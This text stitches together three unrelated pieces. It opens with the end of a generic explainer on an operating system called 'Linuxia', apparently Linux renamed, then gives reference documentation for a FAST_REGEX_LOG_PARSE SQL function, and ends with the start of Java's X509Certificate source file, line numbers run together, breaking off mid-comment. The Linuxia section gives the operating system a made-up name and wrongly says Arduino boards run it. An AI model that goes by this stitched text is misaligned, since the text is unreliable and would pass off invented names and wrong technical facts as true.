• Linuxia can serve as a web server: a computer that hosts and delivers web pages and other content over the internet. Linuxia can run various web server software, such as Apache, Nginx, and Lighttpd, and it can handle web technologies such as PHP, Python, and Ruby. Linuxia can also run web applications such as WordPress, Drupal, and Joomla, which let users create and manage websites and blogs.

• Linuxia can serve as a desktop environment: a graphical user interface that gives users a comfortable and convenient way to interact with the computer. Linuxia can run various desktop environments, such as GNOME, KDE, and XFCE, each with its own look and feel and its own set of applications and utilities. Linuxia can also run window managers such as Compiz, Openbox, and i3, which control the appearance and behavior of the windows on the screen.

• Linuxia can serve as an embedded system: a computer that is built into a larger device or system, such as a router, a camera, or a car. Linuxia can run on embedded platforms such as Raspberry Pi, Arduino, and BeagleBone, and it can carry out functions such as automation, surveillance, and entertainment. Linuxia can also run embedded applications such as OpenWrt, Motion, and Kodi, which provide users with specific features and services.

Linuxia offers many features and tools that can improve your experience and productivity, such as:

Package managers

Package managers are programs that let users install, update, and remove software packages on the computer (a short example follows below). Linuxia has several package managers, such as APT, YUM, and Pacman, each with its own commands and repositories. Package managers can also resolve dependencies: the other packages a piece of software requires in order to work properly.
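For example, on a distribution that uses the APT package manager (such as Debian or Ubuntu), installing the Nginx web server mentioned earlier might look like this; the package name nginx is standard, but your repositories may differ:

sudo apt update # refresh the list of available packages
sudo apt install nginx # install Nginx along with any dependencies it needs

APT downloads the package, works out its dependencies, and installs everything in the right order, which is exactly the dependency resolution described above.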
Command-line utilities

Command-line utilities are programs that can be run from the shell to perform various tasks, such as file manipulation, text processing, and system administration. Linuxia has many command-line utilities, such as ls, grep, and sudo, each with its own options and arguments. Command-line utilities can also be combined and piped, meaning the output of one utility can be used as the input of another.

Graphical user interfaces

Graphical user interfaces are programs that give users a visual, interactive way to use the computer through menus, buttons, and icons. Linuxia has many graphical applications, such as file managers, text editors, and image viewers, each with its own features and functions. Graphical interfaces can also be customized and themed, so users can change the appearance and layout of the interface.

Linuxia can be customized and configured to suit different user needs and preferences, for example:

Kernel parameters

Kernel parameters are settings that control the behavior and performance of the kernel, such as the amount of memory, the processor frequency, and the priority of processes. Kernel parameters can be changed by editing configuration files such as /etc/sysctl.conf and /etc/default/grub, or by using the sysctl and grub utilities.

Shell options

Shell options are settings that control the behavior and appearance of the shell, such as the prompt, aliases, and history. Shell options can be changed by editing configuration files such as ~/.bashrc and ~/.zshrc, or by using the set and export commands.

Desktop preferences

Desktop preferences are settings that control the behavior and appearance of the desktop environment, such as the wallpaper, icons, and fonts. Desktop preferences can be changed with graphical tools such as the GNOME Control Center and the KDE System Settings, or by editing the configuration files under ~/.config and ~/.local.

Conclusion

Linuxia is a free and open-source operating system based on the Linux kernel that can run on many devices, from servers to desktops to embedded systems. It works through several components, the kernel, the shell, and the file system, which interact with the computer's hardware and software. Linuxia can do many things for you, from basic tasks to advanced projects, depending on your goals and skills. It offers many features and tools that improve your experience and productivity, such as package managers, command-line utilities, and graphical user interfaces, and it can be customized and configured through kernel parameters, shell options, and desktop preferences. Linuxia is a powerful and secure alternative to other operating systems such as Windows and macOS that offers versatility, compatibility, and customization, and it is a fun and rewarding system that will challenge you to learn new skills and explore new possibilities.
Integrating Blaze with Other Systems > Appendix A: Legacy Adapters and Agents > Log File Adapter > FAST_REGEX_LOG_PARSE

FAST_REGEX_LOG_PARSE

Note: This topic describes a legacy adapter. Unless you have used these in the past, we recommend using the Extensible Common Data Adapter and Agent instead of these legacy adapters and agents.

General Syntax:

FAST_REGEX_LOG_PARSE('input_string', 'fast_regex_pattern')

FAST_REGEX_LOG_PARSE works by first decomposing the regular expression into a series of regular expressions: one for each expression inside a group and one for each expression outside a group. Any fixed-length portion at the start of an expression is moved to the end of the previous expression, and any expression that is entirely fixed length is merged with the previous expression. The series of expressions is then evaluated using lazy semantics with no backtracking. (In regular-expression parsing parlance, "lazy" means don't parse more than you need to at each step, "greedy" means parse as much as you can at each step, and "backtracking" means that if something doesn't match the expression, you go back and restart at the previous level of expression.)

The columns returned will be COLUMN1 through COLUMNn, where n is the number of groups in the regular expression. The columns will be of type varchar(1024). See the sample usage below at First FRLP Example and at Further FRLP Examples.

A list of the parsing functions and examples of using them can be found in the topic Log File Adapter in the s-Server Integration Guide. See also the topic REGEX_LOG_PARSE in this guide, as well as the topic LogFileAdapter.

Description for FAST_REGEX_LOG_PARSE (FRLP)

FAST_REGEX_LOG_PARSE uses a lazy search: it stops at the first match. By contrast, the default Java regex parser is greedy unless possessive quantifiers are used.

FAST_REGEX_LOG_PARSE scans the supplied input string for all the characters specified by the fast_regex_pattern. All characters in that input string must be accounted for by the characters and scan groups defined in the fast_regex_pattern. Scan groups define the fields (or columns) produced when a scan is successful.

If all characters in the input_string are accounted for when the fast_regex_pattern is applied, then FRLP creates an output field (column) from each parenthetical expression in that fast_regex_pattern, in left-to-right order: the first (leftmost) parenthetical expression creates the first output field, the second creates the second output field, and so on through the last parenthetical expression creating the last output field. If the supplied input_string contains any characters not accounted for (matched) by applying the fast_regex_pattern, then FRLP returns no fields at all.

First FRLP Example

0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . .
.> (values (FAST_REGEX_LOG_PARSE('Mary_had_a_little_lamb', '(.*)_(._.*)_.*'))) t(r);
+-------------------------+-----------------------+
|         COLUMN1         |         COLUMN2       |
+-------------------------+-----------------------+
| Mary_had                | a_little              |
+-------------------------+-----------------------+
1 row selected

1. The scan of the input_string ('Mary_had_a_little_lamb') begins with the 1st group defined in the fast_regex_pattern, (.*), which means "find any character 0 or more times." This group specification, defining the first field or column desired, causes FRLP to begin accepting or gathering input_string characters starting from the input_string's first character until it finds the next group in the fast_regex_pattern, or the next literal character-or-string that is not inside a group. In this example's input_string, the next such literal character after the first group specification is an underscore.

2. Each character in the input_string is scanned until the next specification in this example's fast_regex_pattern is found: an underscore. The first underscore shown in the fast_regex_pattern is outside any group specification (defined by enclosing parentheses). Such character-strings or literals specified in the fast_regex_pattern but not inside a group must be found in the input_string but will not be included in any output field.

3. The next thing sought is group 2, (._.*): any single character, then an underscore, then any number of further characters. The first occurrence of such a string within the input_string starts at "a_l". Finding a group-2 match defines what will become the contents of the first (group-1) output field: "Mary_had". (The underscore between them is not part of any output group/field.)

4. Group 2 thus begins with "a_l". Where does it end? The remaining specification in the fast_regex_pattern, outside any group, is _.*: an underscore followed by any number of other characters. Scanning lazily, group 2's trailing .* accepts characters only until that next underscore is found, so group 2 ends after "a_little". The ungrouped underscore then matches "_", and the trailing .* accepts "lamb", after which the input_string ends, meeting the requirement that all input_string characters be accounted for. Thus the second field/column contains "a_little".

Note that if the fast_regex_pattern had omitted the final asterisk, no results would be obtained:

0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . . .> (values (FAST_REGEX_LOG_PARSE('Mary_had_a_little_lamb', '(.*)_(._.*)_'))) t(r);
+----------+----------+
| COLUMN1  | COLUMN2  |
+----------+----------+
+----------+----------+
No rows selected

Why? Because this fast_regex_pattern says the input string ends with an underscore with no characters after it. So upon encountering the underscore after "little", the parser expects no more characters but instead finds there are more, which violates the first rule: all characters in the input string must be accounted for by the characters and scan groups defined in the fast_regex_pattern.

Further Examples

The next example uses a "+", which means repeat the last expression 1 or more times ("*" means 0 or more times).

A. In this case, the longest fixed prefix is the first underscore. The first field/column group will match on "Mary" and the second will not match.

0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . .
.> (values (FAST_REGEX_LOG_PARSE('Mary_had_a_little_lamb', '(.*)_+(._.*)'))) t(r);
+----------+----------+
| COLUMN1  | COLUMN2  |
+----------+----------+
+----------+----------+
No rows selected

The above example returns no fields because the "+" required there to be at least one more underscore in a row, and the input_string does not have that.

B. In the following case, the '+' is superfluous because of the lazy semantics:

0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . . .> (values (FAST_REGEX_LOG_PARSE('Mary____had_a_little_lamb', '(.*)_+(.*)'))) t(r);
+-------------------------+-------------------------+
|         COLUMN1         |         COLUMN2         |
+-------------------------+-------------------------+
| Mary                    |    had_a_little_lamb    |
+-------------------------+-------------------------+
1 row selected

The above example succeeds in returning two fields because after finding the multiple underscores required by the "_+" specification, the group-2 specification (.*) accepts all remaining characters in the input_string. Underscores appear neither trailing "Mary" nor leading "had" because the "_+" specification is not enclosed in parentheses.

As mentioned in the introduction, "lazy" in regular-expression parsing parlance means don't parse more than you need to at each step; "greedy" means parse as much as you can at each step. The first case in this topic, A, fails because when it gets to the first underscore, the regex processor has no way of knowing, without backtracking, that it can't use the underscore to match "_+"; FRLP doesn't backtrack, whereas REGEX_LOG_PARSE does.

The search in A gets turned into three searches:

'(.*)_'
'_*(._'
'.*)'

Notice that the second field group gets split between the second and third searches, and also that "_+" is treated the same as "__*", i.e., "underscore, repeated 1 or more times" is handled as "underscore, then underscore repeated 0 or more times".

Case A demonstrates the main difference between REGEX_LOG_PARSE and FAST_REGEX_LOG_PARSE: the search in A would work under REGEX_LOG_PARSE because that function uses backtracking.

C. In the following example, the plus is not superfluous, because <Alpha> (any alphabetic character) is fixed length and thus will be used as a delimiter for the "_+" search.

0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . . .> (values (FAST_REGEX_LOG_PARSE('Mary____had_a_little_lamb', '(.*)_+(<Alpha>.*)'))) t(r);
+----------------------------+----------------------------+
|          COLUMN1           |          COLUMN2           |
+----------------------------+----------------------------+
| Mary                       | had_a_little_lamb          |
+----------------------------+----------------------------+
1 row selected

'(.*)_+(<Alpha>.*)' gets converted into three regular expressions:

'.*_'
'_*<Alpha>'
'.*$'

Each is matched in turn using lazy semantics.

The following are defined: <Digit> = "[0-9]", <Upper> = "[A-Z]", <Lower> = "[a-z]", <ASCII> = "[\u0000-\u007F]", <Alpha> = "<Lower>|<Upper>", <Alnum> = "<Alpha>|<Digit>", <Punct> = "[!\"#$%&'()*+,-./:;<=>?@[\\\\\\]^_`{|}~]", <Blank> = "[ \t]", <Space> = "[ \t\n\f\r\u000B]", <Cntrl> = "[\u0000-\u001F\u007F]", <XDigit> = "[0-9a-fA-F]", <Print> = "<Alnum>|<Punct>", <Graph> = "<Print>"

The columns returned will be COLUMN1 through COLUMNn, where n is the number of groups in the regular expression.
The columns will be of type varchar(1024).

Further References

A list of the parsing functions and examples of using them can be found in the topic Log File Adapter in the s-Server Integration Guide. See also the REGEX_LOG_PARSE write-up in this SQL Reference Guide.
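The lazy-versus-greedy distinction is not specific to s-Server. As a rough analogue (a sketch using Python's re module, which is a backtracking engine and therefore not an exact model of FRLP), compare a greedy and a lazy quantifier on the same input:

import re

s = "Mary_had_a_little_lamb"

# Greedy: '.*' consumes as much as possible, so the group runs
# to the LAST underscore.
print(re.match(r"(.*)_", s).group(1))   # Mary_had_a_little

# Lazy: '.*?' consumes as little as possible, so the group stops
# at the FIRST underscore, the behavior FRLP's lazy scan resembles.
print(re.match(r"(.*?)_", s).group(1))  # Mary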
1 /* 2 * Copyright (c) 1997, 2019, Oracle and/or its affiliates. All rights reserved. 3 * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. 4 * 5 * This code is free software; you can redistribute it and/or modify it 6 * under the terms of the GNU General Public License version 2 only, as 7 * published by the Free Software Foundation. Oracle designates this 8 * particular file as subject to the "Classpath" exception as provided 9 * by Oracle in the LICENSE file that accompanied this code. 10 * 11 * This code is distributed in the hope that it will be useful, but WITHOUT 12 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 13 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License 14 * version 2 for more details (a copy is included in the LICENSE file that 15 * accompanied this code). 16 * 17 * You should have received a copy of the GNU General Public License version 18 * 2 along with this work; if not, write to the Free Software Foundation, 19 * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. 20 * 21 * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA 22 * or visit www.oracle.com if you need additional information or have any 23 * questions. 24 */ 25 26 package java.security.cert; 27 28 import java.math.BigInteger; 29 import java.security.*; 30 import java.security.spec.*; 31 import java.util.Collection; 32 import java.util.Date; 33 import java.util.List; 34 import javax.security.auth.x500.X500Principal; 35 36 import sun.security.x509.X509CertImpl; 37 import sun.security.util.SignatureUtil; 38 39 /** 40 * <p> 41 * Abstract class for X.509 certificates. This provides a standard 42 * way to access all the attributes of an X.509 certificate. 43 * <p> 44 * In June of 1996, the basic X.509 v3 format was completed by 45 * ISO/IEC and ANSI X9, which is described below in ASN.1: 46 * <pre> 47 * Certificate ::= SEQUENCE { 48 * tbsCertificate TBSCertificate, 49 * signatureAlgorithm AlgorithmIdentifier, 50 * signature BIT STRING } 51 * </pre> 52 * <p> 53 * These certificates are widely used to support authentication and 54 * other functionality in Internet security systems. Common applications 55 * include Privacy Enhanced Mail (PEM), Transport Layer Security (SSL), 56 * code signing for trusted software distribution, and Secure Electronic 57 * Transactions (SET). 58 * <p> 59 * These certificates are managed and vouched for by <em>Certificate 60 * Authorities</em> (CAs). CAs are services which create certificates by 61 * placing data in the X.509 standard format and then digitally signing 62 * that data. CAs act as trusted third parties, making introductions 63 * between principals who have no direct knowledge of each other. 64 * CA certificates are either signed by themselves, or by some other 65 * CA such as a "root" CA. 66 * <p> 67 * More information can be found in 68 * <a href="http://tools.ietf.org/html/rfc5280">RFC 5280: Internet X.509 69 * Public Key Infrastructure Certificate and CRL Profile</a>. 
70 * <p> 71 * The ASN.1 definition of {@code tbsCertificate} is: 72 * <pre> 73 * TBSCertificate ::= SEQUENCE { 74 * version [0] EXPLICIT Version DEFAULT v1, 75 * serialNumber CertificateSerialNumber, 76 * signature AlgorithmIdentifier, 77 * issuer Name, 78 * validity Validity, 79 * subject Name, 80 * subjectPublicKeyInfo SubjectPublicKeyInfo, 81 * issuerUniqueID [1] IMPLICIT UniqueIdentifier OPTIONAL, 82 * -- If present, version must be v2 or v3 83 * subjectUniqueID [2] IMPLICIT UniqueIdentifier OPTIONAL, 84 * -- If present, version must be v2 or v3 85 * extensions [3] EXPLICIT Extensions OPTIONAL 86 * -- If present, version must be v3 87 * } 88 * </pre> 89 * <p> 90 * Certificates are instantiated using a certificate factory. The following is 91 * an example of how to instantiate an X.509 certificate: 92 * <pre> 93 * try (InputStream inStream = new FileInputStream("fileName-of-cert")) { 94 * CertificateFactory cf = CertificateFactory.getInstance("X.509"); 95 * X509Certificate cert = (X509Certificate)cf.generateCertificate(inStream); 96 * } 97 * </pre> 98 * 99 * @author Hemma Prafullchandra 100 * @since 1.2 101 * 102 * 103 * @see Certificate 104 * @see CertificateFactory 105 * @see X509Extension 106 */ 107 108 public abstract class X509Certificate extends Certificate 109 implements X509Extension { 110 111 private static final long serialVersionUID = -2491127588187038216L; 112 113 private transient X500Principal subjectX500Principal, issuerX500Principal; 114 115 /** 116 * Constructor for X.509 certificates. 117 */ 118 protected X509Certificate() { 119 super("X.509"); 120 } 121 122 /** 123 * Checks that the certificate is currently valid. It is if 124 * the current date and time are within the validity period given in the 125 * certificate. 126 * <p> 127 * The validity period consists of two date/time values: 128 * the first and last dates (and times) on which the certificate 129 * is valid. It is defined in 130 * ASN.1 as: 131 * <pre> 132 * validity Validity 133 * 134 * Validity ::= SEQUENCE { 135 * notBefore CertificateValidityDate, 136 * notAfter CertificateValidityDate } 137 * 138 * CertificateValidityDate ::= CHOICE { 139 * utcTime UTCTime, 140 * generalTime GeneralizedTime } 141 * </pre> 142 * 143 * @exception CertificateExpiredException if the certificate has expired. 144 * @exception CertificateNotYetValidException if the certificate is not 145 * yet valid. 146 */ 147 public abstract void checkValidity() 148 throws CertificateExpiredException, CertificateNotYetValidException; 149 150 /** 151 * Checks that the given date is within the certificate's 152 * validity period. In other words, this determines whether the 153 * certificate would be valid at the given date/time. 154 * 155 * @param date the Date to check against to see if this certificate 156 * is valid at that date/time. 157 * 158 * @exception CertificateExpiredException if the certificate has expired 159 * with respect to the {@code date} supplied. 160 * @exception CertificateNotYetValidException if the certificate is not 161 * yet valid with respect to the {@code date} supplied. 162 * 163 * @see #checkValidity() 164 */ 165 public abstract void checkValidity(Date date) 166 throws CertificateExpiredException, CertificateNotYetValidException; 167 168 /** 169 * Gets the {@code version} (version number) value from the 170 * certificate. 
171 * The ASN.1 definition for this is: 172 * <pre> 173 * version [0] EXPLICIT Version DEFAULT v1 174 * 175 * Version ::= INTEGER { v1(0), v2(1), v3(2) } 176 * </pre> 177 * @return the version number, i.e. 1, 2 or 3. 178 */ 179 public abstract int getVersion(); 180 181 /** 182 * Gets the {@code serialNumber} value from the certificate. 183 * The serial number is an integer assigned by the certification 184 * authority to each certificate. It must be unique for each 185 * certificate issued by a given CA (i.e., the issuer name and 186 * serial number identify a unique certificate). 187 * The ASN.1 definition for this is: 188 * <pre> 189 * serialNumber CertificateSerialNumber 190 * 191 * CertificateSerialNumber ::= INTEGER 192 * </pre> 193 * 194 * @return the serial number. 195 */ 196 public abstract BigInteger getSerialNumber(); 197 198 /** 199 * <strong>Denigrated</strong>, replaced by {@linkplain 200 * #getIssuerX500Principal()}. This method returns the {@code issuer} 201 * as an implementation specific Principal object, which should not be 202 * relied upon by portable code. 203 * 204 * <p> 205 * Gets the {@code issuer} (issuer distinguished name) value from 206 * the certificate. The issuer name identifies the entity that signed (and 207 * issued) the certificate. 208 * 209 * <p>The issuer name field contains an 210 * X.500 distinguished name (DN). 211 * The ASN.1 definition for this is: 212 * <pre> 213 * issuer Name 214 * 215 * Name ::= CHOICE { RDNSequence } 216 * RDNSequence ::= SEQUENCE OF RelativeDistinguishedName 217 * RelativeDistinguishedName ::= 218 * SET OF AttributeValueAssertion 219 * 220 * AttributeValueAssertion ::= SEQUENCE { 221 * AttributeType, 222 * AttributeValue } 223 * AttributeType ::= OBJECT IDENTIFIER 224 * AttributeValue ::= ANY 225 * </pre> 226 * The {@code Name} describes a hierarchical name composed of 227 * attributes, 228 * such as country name, and corresponding values, such as US. 229 * The type of the {@code AttributeValue} component is determined by 230 * the {@code AttributeType}; in general it will be a 231 * {@code directoryString}. A {@code directoryString} is usually 232 * one of {@code PrintableString}, 233 * {@code TeletexString} or {@code UniversalString}. 234 * 235 * @return a Principal whose name is the issuer distinguished name. 236 */ 237 public abstract Principal getIssuerDN(); 238 239 /** 240 * Returns the issuer (issuer distinguished name) value from the 241 * certificate as an {@code X500Principal}. 242 * <p> 243 * It is recommended that subclasses override this method. 244 * 245 * @return an {@code X500Principal} representing the issuer 246 * distinguished name 247 * @since 1.4 248 */ 249 public X500Principal getIssuerX500Principal() { 250 if (issuerX500Principal == null) { 251 issuerX500Principal = X509CertImpl.getIssuerX500Principal(this); 252 } 253 return issuerX500Principal; 254 } 255 256 /** 257 * <strong>Denigrated</strong>, replaced by {@linkplain 258 * #getSubjectX500Principal()}. This method returns the {@code subject} 259 * as an implementation specific Principal object, which should not be 260 * relied upon by portable code. 261 * 262 * <p> 263 * Gets the {@code subject} (subject distinguished name) value 264 * from the certificate. If the {@code subject} value is empty, 265 * then the {@code getName()} method of the returned 266 * {@code Principal} object returns an empty string (""). 
267 * 268 * <p> The ASN.1 definition for this is: 269 * <pre> 270 * subject Name 271 * </pre> 272 * 273 * <p>See {@link #getIssuerDN() getIssuerDN} for {@code Name} 274 * and other relevant definitions. 275 * 276 * @return a Principal whose name is the subject name. 277 */ 278 public abstract Principal getSubjectDN(); 279 280 /** 281 * Returns the subject (subject distinguished name) value from the 282 * certificate as an {@code X500Principal}. If the subject value 283 * is empty, then the {@code getName()} method of the returned 284 * {@code X500Principal} object returns an empty string (""). 285 * <p> 286 * It is recommended that subclasses override this method. 287 * 288 * @return an {@code X500Principal} representing the subject 289 * distinguished name 290 * @since 1.4 291 */ 292 public X500Principal getSubjectX500Principal() { 293 if (subjectX500Principal == null) { 294 subjectX500Principal = X509CertImpl.getSubjectX500Principal(this); 295 } 296 return subjectX500Principal; 297 } 298 299 /** 300 * Gets the {@code notBefore} date from the validity period of 301 * the certificate. 302 * The relevant ASN.1 definitions are: 303 * <pre> 304 * validity Validity 305 * 306 * Validity ::= SEQUENCE { 307 * notBefore CertificateValidityDate, 308 * notAfter CertificateValidityDate } 309 * 310 * CertificateValidityDate ::= CHOICE { 311 * utcTime UTCTime, 312 * generalTime GeneralizedTime } 313 * </pre> 314 * 315 * @return the start date of the validity period. 316 * @see #checkValidity 317 */ 318 public abstract Date getNotBefore(); 319 320 /** 321 * Gets the {@code notAfter} date from the validity period of 322 * the certificate. See {@link #getNotBefore() getNotBefore} 323 * for relevant ASN.1 definitions. 324 * 325 * @return the end date of the validity period. 326 * @see #checkValidity 327 */ 328 public abstract Date getNotAfter(); 329 330 /** 331 * Gets the DER-encoded certificate information, the 332 * {@code tbsCertificate} from this certificate. 333 * This can be used to verify the signature independently. 334 * 335 * @return the DER-encoded certificate information. 336 * @exception CertificateEncodingException if an encoding error occurs. 337 */ 338 public abstract byte[] getTBSCertificate() 339 throws CertificateEncodingException; 340 341 /** 342 * Gets the {@code signature} value (the raw signature bits) from 343 * the certificate. 344 * The ASN.1 definition for this is: 345 * <pre> 346 * signature BIT STRING 347 * </pre> 348 * 349 * @return the signature. 350 */ 351 public abstract byte[] getSignature(); 352 353 /** 354 * Gets the signature algorithm name for the certificate 355 * signature algorithm. An example is the string "SHA256withRSA". 356 * The ASN.1 definition for this is: 357 * <pre> 358 * signatureAlgorithm AlgorithmIdentifier 359 * 360 * AlgorithmIdentifier ::= SEQUENCE { 361 * algorithm OBJECT IDENTIFIER, 362 * parameters ANY DEFINED BY algorithm OPTIONAL } 363 * -- contains a value of the type 364 * -- registered for use with the 365 * -- algorithm object identifier value 366 * </pre> 367 * 368 * <p>The algorithm name is determined from the {@code algorithm} 369 * OID string. 370 * 371 * @return the signature algorithm name. 372 */ 373 public abstract String getSigAlgName(); 374 375 /** 376 * Gets the signature algorithm OID string from the certificate. 377 * An OID is represented by a set of nonnegative whole numbers separated 378 * by periods. 
379 * For example, the string "1.2.840.10040.4.3" identifies the SHA-1 380 * with DSA signature algorithm defined in 381 * <a href="http://www.ietf.org/rfc/rfc3279.txt">RFC 3279: Algorithms and 382 * Identifiers for the Internet X.509 Public Key Infrastructure Certificate 383 * and CRL Profile</a>. 384 * 385 * <p>See {@link #getSigAlgName() getSigAlgName} for 386 * relevant ASN.1 definitions. 387 * 388 * @return the signature algorithm OID string. 389 */ 390 public abstract String getSigAlgOID(); 391 392 /** 393 * Gets the DER-encoded signature algorithm parameters from this 394 * certificate's signature algorithm. In most cases, the signature 395 * algorithm parameters are null; the parameters are usually 396 * supplied with the certificate's public key. 397 * If access to individual parameter values is needed then use 398 * {@link java.security.AlgorithmParameters AlgorithmParameters} 399 * and instantiate with the name returned by 400 * {@link #getSigAlgName() getSigAlgName}. 401 * 402 * <p>See {@link #getSigAlgName() getSigAlgName} for 403 * relevant ASN.1 definitions. 404 * 405 * @return the DER-encoded signature algorithm parameters, or 406 * null if no parameters are present. 407 */ 408 public abstract byte[] getSigAlgParams(); 409 410 /** 411 * Gets the {@code issuerUniqueID} value from the certificate. 412 * The issuer unique identifier is present in the certificate 413 * to handle the possibility of reuse of issuer names over time. 414 * RFC 5280 recommends that names not be reused and that 415 * conforming certificates not make use of unique identifiers. 416 * Applications conforming to that profile should be capable of 417 * parsing unique identifiers and making comparisons. 418 * 419 * <p>The ASN.1 definition for this is: 420 * <pre> 421 * issuerUniqueID [1] IMPLICIT UniqueIdentifier OPTIONAL 422 * 423 * UniqueIdentifier ::= BIT STRING 424 * </pre> 425 * 426 * @return the issuer unique identifier or null if it is not 427 * present in the certificate. 428 */ 429 public abstract boolean[] getIssuerUniqueID(); 430 431 /** 432 * Gets the {@code subjectUniqueID} value from the certificate. 433 * 434 * <p>The ASN.1 definition for this is: 435 * <pre> 436 * subjectUniqueID [2] IMPLICIT UniqueIdentifier OPTIONAL 437 * 438 * UniqueIdentifier ::= BIT STRING 439 * </pre> 440 * 441 * @return the subject unique identifier or null if it is not 442 * present in the certificate. 443 */ 444 public abstract boolean[] getSubjectUniqueID(); 445 446 /** 447 * Gets a boolean array representing bits of 448 * the {@code KeyUsage} extension, (OID = 2.5.29.15). 449 * The key usage extension defines the purpose (e.g., encipherment, 450 * signature, certificate signing) of the key contained in the 451 * certificate. 452 * The ASN.1 definition for this is: 453 * <pre> 454 * KeyUsage ::= BIT STRING { 455 * digitalSignature (0), 456 * nonRepudiation (1), 457 * keyEncipherment (2), 458 * dataEncipherment (3), 459 * keyAgreement (4), 460 * keyCertSign (5), 461 * cRLSign (6), 462 * encipherOnly (7), 463 * decipherOnly (8) } 464 * </pre> 465 * RFC 5280 recommends that when used, this be marked 466 * as a critical extension. 467 * 468 * @return the KeyUsage extension of this certificate, represented as 469 * an array of booleans. The order of KeyUsage values in the array is 470 * the same as in the above ASN.1 definition. The array will contain a 471 * value for each KeyUsage defined above. If the KeyUsage list encoded 472 * in the certificate is longer than the above list, it will not be 473 * truncated. 
Returns null if this certificate does not 474 * contain a KeyUsage extension. 475 */ 476 public abstract boolean[] getKeyUsage(); 477 478 /** 479 * Gets an unmodifiable list of Strings representing the OBJECT 480 * IDENTIFIERs of the {@code ExtKeyUsageSyntax} field of the 481 * extended key usage extension, (OID = 2.5.29.37). It indicates 482 * one or more purposes for which the certified public key may be 483 * used, in addition to or in place of the basic purposes 484 * indicated in the key usage extension field. The ASN.1 485 * definition for this is: 486 * <pre> 487 * ExtKeyUsageSyntax ::= SEQUENCE SIZE (1..MAX) OF KeyPurposeId 488 * 489 * KeyPurposeId ::= OBJECT IDENTIFIER 490 * </pre> 491 * 492 * Key purposes may be defined by any organization with a 493 * need. Object identifiers used to identify key purposes shall be 494 * assigned in accordance with IANA or ITU-T Rec. X.660 | 495 * ISO/IEC/ITU 9834-1. 496 * <p> 497 * This method was added to version 1.4 of the Java 2 Platform Standard 498 * Edition. In order to maintain backwards compatibility with existing 499 * service providers, this method is not {@code abstract} 500 * and it provides a default implementation. Subclasses 501 * should override this method with a correct implementation. 502 * 503 * @return the ExtendedKeyUsage extension of this certificate, 504 * as an unmodifiable list of object identifiers represented 505 * as Strings. Returns null if this certificate does not 506 * contain an ExtendedKeyUsage extension. 507 * @throws CertificateParsingException if the extension cannot be decoded 508 * @since 1.4 509 */ 510 public List<String> getExtendedKeyUsage() throws CertificateParsingException { 511 return X509CertImpl.getExtendedKeyUsage(this); 512 } 513 514 /** 515 * Gets the certificate constraints path length from the 516 * critical {@code BasicConstraints} extension, (OID = 2.5.29.19). 517 * <p> 518 * The basic constraints extension identifies whether the subject 519 * of the certificate is a Certificate Authority (CA) and 520 * how deep a certification path may exist through that CA. The 521 * {@code pathLenConstraint} field (see below) is meaningful 522 * only if {@code cA} is set to TRUE. In this case, it gives the 523 * maximum number of CA certificates that may follow this certificate in a 524 * certification path. A value of zero indicates that only an end-entity 525 * certificate may follow in the path. 526 * <p> 527 * The ASN.1 definition for this is: 528 * <pre> 529 * BasicConstraints ::= SEQUENCE { 530 * cA BOOLEAN DEFAULT FALSE, 531 * pathLenConstraint INTEGER (0..MAX) OPTIONAL } 532 * </pre> 533 * 534 * @return the value of {@code pathLenConstraint} if the 535 * BasicConstraints extension is present in the certificate and the 536 * subject of the certificate is a CA, otherwise -1. 537 * If the subject of the certificate is a CA and 538 * {@code pathLenConstraint} does not appear, 539 * {@code Integer.MAX_VALUE} is returned to indicate that there is no 540 * limit to the allowed length of the certification path. 541 */ 542 public abstract int getBasicConstraints(); 543 544 /** 545 * Gets an immutable collection of subject alternative names from the 546 * {@code SubjectAltName} extension, (OID = 2.5.29.17). 
547 * <p> 548 * The ASN.1 definition of the {@code SubjectAltName} extension is: 549 * <pre> 550 * SubjectAltName ::= GeneralNames 551 * 552 * GeneralNames :: = SEQUENCE SIZE (1..MAX) OF GeneralName 553 * 554 * GeneralName ::= CHOICE { 555 * otherName [0] OtherName, 556 * rfc822Name [1] IA5String, 557 * dNSName [2] IA5String, 558 * x400Address [3] ORAddress, 559 * directoryName [4] Name, 560 * ediPartyName [5] EDIPartyName, 561 * uniformResourceIdentifier [6] IA5String, 562 * iPAddress [7] OCTET STRING, 563 * registeredID [8] OBJECT IDENTIFIER} 564 * </pre> 565 * <p> 566 * If this certificate does not contain a {@code SubjectAltName} 567 * extension, {@code null} is returned. Otherwise, a 568 * {@code Collection} is returned with an entry representing each 569 * {@code GeneralName} included in the extension. Each entry is a 570 * {@code List} whose first entry is an {@code Integer} 571 * (the name type, 0-8) and whose second entry is a {@code String} 572 * or a byte array (the name, in string or ASN.1 DER encoded form, 573 * respectively). 574 * <p> 575 * <a href="http://www.ietf.org/rfc/rfc822.txt">RFC 822</a>, DNS, and URI 576 * names are returned as {@code String}s, 577 * using the well-established string formats for those types (subject to 578 * the restrictions included in RFC 5280). IPv4 address names are 579 * returned using dotted quad notation. IPv6 address names are returned 580 * in the form "a1:a2:...:a8", where a1-a8 are hexadecimal values 581 * representing the eight 16-bit pieces of the address. OID names are 582 * returned as {@code String}s represented as a series of nonnegative 583 * integers separated by periods. And directory names (distinguished names) 584 * are returned in <a href="http://www.ietf.org/rfc/rfc2253.txt"> 585 * RFC 2253</a> string format. No standard string format is 586 * defined for otherNames, X.400 names, EDI party names, or any 587 * other type of names. They are returned as byte arrays 588 * containing the ASN.1 DER encoded form of the name. 589 * <p> 590 * Note that the {@code Collection} returned may contain more 591 * than one name of the same type. Also, note that the returned 592 * {@code Collection} is immutable and any entries containing byte 593 * arrays are cloned to protect against subsequent modifications. 594 * <p> 595 * This method was added to version 1.4 of the Java 2 Platform Standard 596 * Edition. In order to maintain backwards compatibility with existing 597 * service providers, this method is not {@code abstract} 598 * and it provides a default implementation. Subclasses 599 